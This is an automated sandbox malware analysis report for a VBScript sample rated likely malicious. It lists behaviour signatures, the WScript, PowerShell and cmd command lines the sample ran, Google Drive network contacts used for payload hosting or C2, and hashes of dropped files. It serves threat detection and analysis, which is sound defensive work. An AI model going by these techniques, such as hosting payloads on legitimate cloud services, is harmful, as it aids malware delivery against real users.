Malware Analysis Report

2025-08-10 21:50

Sample ID 240608-h4654sba89
Target 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
SHA256 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
Tags
score
8/10

Analysis Overview

score
8/10

SHA256

83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d

Threat Level: Likely malicious

The file 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs was found to be: Likely malicious.

Malicious Activity Summary

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-08 07:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 07:18

Reported

2024-06-08 07:21

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 36113f68a185488c2fbe2bfcf34bcfdc
SHA1 3e702a1bda44d41c8fad9ad56039be843c9a0706
SHA256 fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233
SHA512 96bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45

memory/464-328-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp

memory/464-329-0x000000001B650000-0x000000001B932000-memory.dmp

memory/464-330-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/464-331-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/464-332-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/464-335-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 07:18

Reported

2024-06-08 07:21

Platform

win10v2004-20240426-en

Max time kernel

94s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 161.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 290fae52f17dbaeec503dfb5d085abff
SHA1 fdae242a21f6383d0d5aab98f1bf1f3768d833b6
SHA256 d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9
SHA512 7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 e3c54d10d7b28f4437e5082454a22cb7
SHA1 f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e
SHA256 4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b
SHA512 f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 b98730add3fdac807aa8a524679c31c7
SHA1 0027f4bf52d43ea2aaee06a78c4dca190799e5f9
SHA256 8a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed
SHA512 546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3

memory/4808-311-0x00007FFBFE473000-0x00007FFBFE475000-memory.dmp

memory/4808-313-0x0000026BB38B0000-0x0000026BB38D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3j3x4tj.eds.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4808-322-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-323-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-326-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-329-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-330-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp